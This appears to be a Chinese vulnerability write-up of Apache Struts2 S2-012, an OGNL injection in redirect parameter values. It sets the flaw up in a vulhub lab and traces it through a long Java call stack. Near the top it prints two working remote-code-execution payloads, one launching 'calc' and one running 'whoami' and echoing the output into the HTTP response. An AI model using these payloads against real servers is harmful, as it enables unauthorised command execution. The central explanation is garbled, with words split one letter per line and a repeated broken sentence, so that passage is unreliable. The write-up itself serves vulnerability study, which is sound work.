0x00 前言
之前的003,005,009都是基于参数本身的ONGL注入,012则是基于参数值的ONGL注入
0x01 环境
还是建议使用vulhub
poc:
无回显
%{(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#_memberAccess['allowStaticMethodAccess']=true)(@java.lang.Runtime@getRuntime().exec('calc'))}
有回显
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
0x02 正文
还是在\xwork-core-2.2.3.jar!\com\opensymphony\xwork2\interceptor\ParametersInterceptor.class#doIntercept
跟进invoke
然后继续跟进,知道到达处理<result name="redirect" type="redirect">/redirect.action?user=${name}</result>,struts2可以通过redirect跳转url或者其他action,在跳转action的时候,如果存在
n
a
m
e
进行解析的时候,如果遇到
o
n
g
l
就会进行解析,由于
p
o
s
没有重置的问题,会进行二次解析,第一次解析
‘
name进行解析的时候,如果遇到ongl就会进行解析,由于pos没有重置的问题,会进行二次解析,第一次解析`
name进行解析的时候,如果遇到ongl就会进行解析,由于pos没有重置的问题,会进行二次解析,第一次解析‘name,第二次会解析$name`的值。
完整Stack:
exec:347, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeMethod:871, OgnlRuntime (ognl)
callAppropriateMethod:1273, OgnlRuntime (ognl)
callMethod:68, ObjectMethodAccessor (ognl)
callMethodWithDebugInfo:117, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:108, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:1349, OgnlRuntime (ognl)
getValueBody:90, ASTMethod (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:141, ASTChain (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:58, ASTEval (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValue:494, Ognl (ognl)
getValue:217, OgnlUtil (com.opensymphony.xwork2.ognl)
getValue:342, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValue:331, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValueWhenExpressionIsNotNull:307, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:293, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:350, OgnlValueStack (com.opensymphony.xwork2.ognl)
translateVariables:196, TextParseUtil (com.opensymphony.xwork2.util)
translateVariables:129, TextParseUtil (com.opensymphony.xwork2.util)
translateVariables:73, TextParseUtil (com.opensymphony.xwork2.util)
conditionalParse:198, StrutsResultSupport (org.apache.struts2.dispatcher)
execute:185, StrutsResultSupport (org.apache.struts2.dispatcher)
execute:158, ServletRedirectResult (org.apache.struts2.dispatcher)
executeResult:373, DefaultActionInvocation (com.opensymphony.xwork2)
invoke:277, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:176, DefaultWorkflowInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:263, ValidationInterceptor (com.opensymphony.xwork2.validator)
doIntercept:68, AnnotationValidationInterceptor (org.apache.struts2.interceptor.validation)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:133, ConversionErrorInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:207, ParametersInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:207, ParametersInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, StaticParametersInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:75, MultiselectInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:94, CheckboxInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:243, FileUploadInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:100, ModelDrivenInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:141, ScopedModelDrivenInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:270, DebuggingInterceptor (org.apache.struts2.interceptor.debugging)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:145, ChainingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:171, PrepareInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:176, I18nInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:164, ServletConfigInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, AliasInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:187, ExceptionMappingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
execute:52, StrutsActionProxy (org.apache.struts2.impl)
serviceAction:498, Dispatcher (org.apache.struts2.dispatcher)
doFilter:434, FilterDispatcher (org.apache.struts2.dispatcher)
internalDoFilter:235, ApplicationFilterChain (org.apache.catalina.core)
doFilter:206, ApplicationFilterChain (org.apache.catalina.core)
invoke:233, StandardWrapperValve (org.apache.catalina.core)
invoke:191, StandardContextValve (org.apache.catalina.core)
invoke:127, StandardHostValve (org.apache.catalina.core)
invoke:103, ErrorReportValve (org.apache.catalina.valves)
invoke:109, StandardEngineValve (org.apache.catalina.core)
service:293, CoyoteAdapter (org.apache.catalina.connector)
process:859, Http11Processor (org.apache.coyote.http11)
process:610, Http11Protocol$Http11ConnectionHandler (org.apache.coyote.http11)
run:503, JIoEndpoint$Worker (org.apache.tomcat.util.net)
run:748, Thread (java.lang)
0x03 修复方式
通过不重置pos的方式,仅允许ONGL执行一次的方式进行修复
